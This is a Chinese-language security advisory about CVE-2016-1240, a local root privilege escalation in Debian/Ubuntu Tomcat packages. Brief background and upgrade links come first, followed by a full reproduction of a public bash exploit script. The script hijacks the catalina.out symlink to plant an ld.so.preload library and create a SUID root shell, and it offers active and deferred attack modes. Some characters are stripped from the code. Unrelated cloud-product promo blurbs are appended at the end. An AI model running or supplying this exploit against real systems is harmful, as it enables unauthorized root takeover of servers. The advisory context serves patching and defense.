Debian Ubuntu Root权限受到威胁 Tomcat本地提权漏洞CVE-2016-1240 请安全运维尽快升级

2016年9月30日，legalhackers.com网站发布了一个关于Tomcat漏洞的公告，所涉及漏洞的编号为CVE-2016-1240。Debian系统的Linux上管理员通常利用apt-get进行包管理，debian包的一个初始化脚本中存在漏洞，会让deb包安装程序自动执行启动脚本，脚本位置/etc/init.d/tomcatN

攻击者可以在拥有Tomcat低权限的情况下，利用该漏洞获得系统的root权限。受影响的系统包括Debian和ubuntu，其他使用debian包的系统也可能会受影响。

详情请见以下链接：

http://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html https://security-tracker.debian.org/tracker/CVE-2016-1240

CVE-2016-4438

受影响的版本

受影响的系统包括Debian、Ubuntu，其他使用相应deb包的系统也可能受到影响。受影响的debian包如下：

Tomcat 8 = 8.0.36-2 Tomcat 7 = 7.0.70-2 Tomcat 6 = 6.0.45+dfsg-1~deb8u1 Tomcat是什么

Tomcat是个运行在Apache上的应用服务器，支持运行Servlet/JSP应用程序的容器——可以将Tomcat看作是Apache的扩展，实际上Tomcat也可以独立于Apache运行。

Tomcat是由Apache软件基金会下属的Jakarta项目开发的一个Servlet容器，按照Sun Microsystems提供的技术规范，实现了对Servlet和JavaServer Page（JSP）的支持，并提供了作为Web服务器的一些特有功能，如Tomcat管理和控制平台、安全域管理和Tomcat阀等。由于Tomcat本身也内含了一个HTTP服务器，它也可以被视作一个单独的Web服务器。

Debian是什么

广义的Debian是指一个致力于创建自由操作系统的合作组织及其作品，由于Debian项目众多内核分支中以Linux宏内核为主，而且 Debian开发者 所创建的操作系统中绝大部分基础工具来自于GNU工程 ，因此 “Debian” 常指Debian GNU/Linux。

Tomcat安全团队已经修复了受影响的包，建议用户升级到最新版本，新版本下载地址如下：

https://sources.debian.net/src/tomcat6/ https://sources.debian.net/src/tomcat7/ https://sources.debian.net/src/tomcat8/ Tomcat Root提权漏洞简析

本地攻击者，作为tomcat用户（比如说，通过web应用的漏洞）若将catalina.out修改为指向任意系统文件的链接，一旦Tomcat init脚本（ROOT权限运行）在服务重启后再次打开catalina.out文件，攻击者就可获取ROOT权限。

# Run the catalina.sh script as a daemon

set +e

touch "$CATALINA_PID" "$CATALINA_BASE"/logs/catalina.out

chown $TOMCAT7_USER "$CATALINA_PID" "$CATALINA_BASE"/logs/catalina.out

Tomcat Root提权漏洞验证程序

------[ tomcat-rootprivesc-deb.sh ]------

#!/bin/bash 
# 
# Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit 
# 
# CVE-2016-1240 
# 
# Discovered and coded by: 
# 
# Dawid Golunski 
# http://legalhackers.com 
# 
# This exploit targets Tomcat (versions 6, 7 and 8) packaging on 
# Debian-based distros including Debian, Ubuntu etc. 
# It allows attackers with a tomcat shell (e.g. obtained remotely through a 
# vulnerable java webapp, or locally via weak permissions on webapps in the 
# Tomcat webroot directories etc.) to escalate their privileges to root. 
# 
# Usage: 
# ./tomcat-rootprivesc-deb.sh path_to_catalina.out [-deferred] 
# 
# The exploit can used in two ways: 
# 
# -active (assumed by default) - which waits for a Tomcat restart in a loop and instantly 
# gains/executes a rootshell via ld.so.preload as soon as Tomcat service is restarted. 
# It also gives attacker a chance to execute: kill [tomcat-pid] command to force/speed up 
# a Tomcat restart (done manually by an admin, or potentially by some tomcat service watchdog etc.) 
# 
# -deferred (requires the -deferred switch on argv[2]) - this mode symlinks the logfile to 
# /etc/default/locale and exits. It removes the need for the exploit to run in a loop waiting. 
# Attackers can come back at a later time and check on the /etc/default/locale file. Upon a 
# Tomcat restart / server reboot, the file should be owned by tomcat user. The attackers can 
# then add arbitrary commands to the file which will be executed with root privileges by 
# the /etc/cron.daily/tomcatN logrotation cronjob (run daily around 6:25am on default 
# Ubuntu/Debian Tomcat installations). 
# 
# See full advisory for details at: 
# http://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html 
# 
# Disclaimer: 
# For testing purposes only. Do no harm. 
#

BACKDOORSH="/bin/bash" 
BACKDOORPATH="/tmp/tomcatrootsh" 
PRIVESCLIB="/tmp/privesclib.so" 
PRIVESCSRC="/tmp/privesclib.c" 
SUIDBIN="/usr/bin/sudo"

function cleanexit { 
# Cleanup 
echo -e "\n[+] Cleaning up..." 
rm -f $PRIVESCSRC 
rm -f $PRIVESCLIB 
rm -f $TOMCATLOG 
touch $TOMCATLOG 
if [ -f /etc/ld.so.preload ]; then 
echo -n /etc/ld.so.preload 2 /dev/null 
fi 
echo -e "\n[+] Job done. Exiting with code $1 \n" 
exit $1 
}

function ctrl_c() { 
echo -e "\n[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation." 
cleanexit 0 
}

#intro 
echo -e "\033[94m \nTomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit\nCVE-2016-1240\n" 
echo -e "Discovered and coded by: \n\nDawid Golunski \nhttp://legalhackers.com \033[0m"

# Args 
if [ $# -lt 1 ]; then 
echo -e "\n[!] Exploit usage: \n\n$0 path_to_catalina.out [-deferred]\n" 
exit 3 
fi 
if [ "$2" = "-deferred" ]; then 
mode="deferred" 
else 
mode="active" 
fi

# Priv check 
echo -e "\n[+] Starting the exploit in [\033[94m$mode\033[0m] mode with the following privileges: \n`id`" 
id | grep -q tomcat 
if [ $? -ne 0 ]; then 
echo -e "\n[!] You need to execute the exploit as tomcat user! Exiting.\n" 
exit 3 
fi

# Set target paths 
TOMCATLOG="$1" 
if [ ! -f $TOMCATLOG ]; then 
echo -e "\n[!] The specified Tomcat catalina.out log ($TOMCATLOG) doesnt exist. Try again.\n" 
exit 3 
fi 
echo -e "\n[+] Target Tomcat log file set to $TOMCATLOG"

# [ Deferred exploitation ]

# Symlink the log file to /etc/default/locale file which gets executed daily on default 
# tomcat installations on Debian/Ubuntu by the /etc/cron.daily/tomcatN logrotation cronjob around 6:25am. 
# Attackers can freely add their commands to the /etc/default/locale script after Tomcat has been 
# restarted and file owner gets changed. 
if [ "$mode" = "deferred" ]; then 
rm -f $TOMCATLOG ln -s /etc/default/locale $TOMCATLOG 
if [ $? -ne 0 ]; then 
echo -e "\n[!] Couldnt remove the $TOMCATLOG file or create a symlink." 
cleanexit 3 
fi 
echo -e  "\n[+] Symlink created at: \n`ls -l $TOMCATLOG`" 
echo -e  "\n[+] The current owner of the file is: \n`ls -l /etc/default/locale`" 
echo -ne "\n[+] Keep an eye on the owner change on /etc/default/locale . After the Tomcat restart / system reboot" 
echo -ne "\n    youll be able to add arbitrary commands to the file which will get executed with root privileges" 
echo -ne "\n    at ~6:25am by the /etc/cron.daily/tomcatN log rotation cron. See also -active mode if you cant wait ;)\n\n" 
exit 0 
fi

# [ Active exploitation ]

trap ctrl_c INT 
# Compile privesc preload library 
echo -e "\n[+] Compiling the privesc shared library ($PRIVESCSRC)" 
cat _solibeof_ $PRIVESCSRC 
#define _GNU_SOURCE 
#include stdio.h  
#include sys/stat.h  
#include unistd.h  
#include dlfcn.h  
uid_t geteuid(void) { 
static uid_t  (*old_geteuid)(); 
old_geteuid = dlsym(RTLD_NEXT, "geteuid"); 
if ( old_geteuid() == 0 ) { 
chown("$BACKDOORPATH", 0, 0); 
chmod("$BACKDOORPATH", 04777); 
unlink("/etc/ld.so.preload"); 
} 
return old_geteuid(); 
} 
_solibeof_ 
gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl 
if [ $? -ne 0 ]; then 
echo -e "\n[!] Failed to compile the privesc lib $PRIVESCSRC." 
cleanexit 2; 
fi

# Prepare backdoor shell 
cp $BACKDOORSH $BACKDOORPATH 
echo -e "\n[+] Backdoor/low-priv shell installed at: \n`ls -l $BACKDOORPATH`"

# Safety check 
if [ -f /etc/ld.so.preload ]; then 
echo -e "\n[!] /etc/ld.so.preload already exists. Exiting for safety." 
cleanexit 2 
fi

# Symlink the log file to ld.so.preload 
rm -f $TOMCATLOG ln -s /etc/ld.so.preload $TOMCATLOG 
if [ $? -ne 0 ]; then 
echo -e "\n[!] Couldnt remove the $TOMCATLOG file or create a symlink." 
cleanexit 3 
fi 
echo -e "\n[+] Symlink created at: \n`ls -l $TOMCATLOG`"

# Wait for Tomcat to re-open the logs 
echo -ne "\n[+] Waiting for Tomcat to re-open the logs/Tomcat service restart..." 
echo -e  "\nYou could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;)" 
while :; do 
sleep 0.1 
if [ -f /etc/ld.so.preload ]; then 
echo $PRIVESCLIB /etc/ld.so.preload 
break; 
fi 
done

# /etc/ld.so.preload file should be owned by tomcat user at this point 
# Inject the privesc.so shared library to escalate privileges 
echo $PRIVESCLIB /etc/ld.so.preload 
echo -e "\n[+] Tomcat restarted. The /etc/ld.so.preload file got created with tomcat privileges: \n`ls -l /etc/ld.so.preload`" 
echo -e "\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload" 
echo -e "\n[+] The /etc/ld.so.preload file now contains: \n`cat /etc/ld.so.preload`"

# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo) 
echo -e "\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!" 
sudo --help 2 /dev/null /dev/null

# Check for the rootshell 
ls -l $BACKDOORPATH | grep rws | grep -q root 
if [ $? -eq 0 ]; then 
echo -e "\n[+] Rootshell got assigned root SUID perms at: \n`ls -l $BACKDOORPATH`" 
echo -e "\n\033[94mPlease tell me youre seeing this too ;) \033[0m" 
else 
echo -e "\n[!] Failed to get root" 
cleanexit 2 
fi

# Execute the rootshell 
echo -e "\n[+] Executing the rootshell $BACKDOORPATH now! \n" 
$BACKDOORPATH -p -c "rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB" 
$BACKDOORPATH -p

# Job done. 
cleanexit 0

--------------[ EOF ]-------------------- 

绿盟科技声明

本安全公告仅用来描述可能存在的安全问题，绿盟科技不为此安全公告提供任何保证或承诺。由于传播、利用此安全公告所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，绿盟科技以及安全公告作者不为此承担任何责任。绿盟科技拥有对此安全公告的修改和解释权。如欲转载或传播此安全公告，必须保证此安全公告的完整性，包括版权声明等全部内容。未经绿盟科技允许，不得任意修改或者增减此安全公告内容，不得以任何方式将其用于商业目的。

原文发布时间：2017年3月24日

本文由：绿盟科技 发布，版权归属于原作者

原文链接：http://toutiao.secjia.com/tomcat-root-privilege-escalation-exploit-cve-2016-1240

本文来自云栖社区合作伙伴安全加，了解相关信息可以关注安全加网站

《ECS全知道（下） 镜像与快照+块存储、安全、网运维与监控》电子版下载地址 作为阿里云五大基础服务之一，云服务器ECS一直是阿里云的核心产品。为更好的帮助用户了解ECS以及解决可能遇到的问题，阿里云内容设计中心团队根据丰富的内容设计经验，从各渠道的用户反馈中，总结归纳出了ECS各方面的常见问题，与阿里云开发者社区联合打造了《ECS全知道》上下两册电子手册，《ECS全知道》精准锁定镜像与快照+块存储，安全，网络，运维与监控，希望可以给正在学习和使用ECS的用户提供一些帮助。
数字化安全生产平台DPS重磅发布-助力传统运维向SRE转型 11 月 5 日，在 2022 杭州·云栖大会上，数字化安全生产平台 DPS 重磅发布，助力传统运维向 SRE 转型。演讲人：阿里云智能资深技术专家，高可用架构负责人周洋（中亭）
Linux运维安全之Redis 说说IT运维那些事，服务器如果不注意安全的话，就有可能会被入侵，特别是安装了redis的Linux服务器，如果安全防范没做好的话，更有可能会被入侵，被入侵以后会有很多种危害，那么我总结了有以下几种危害，服务器被入侵以后，你的数据可能会被删除第二个如果服务器被入侵以后可能会中病毒木马，比如说勒索病毒把你的服务器文件全部加密了，然后你需要给赎金才给你解密处理恢复，会非常的棘手。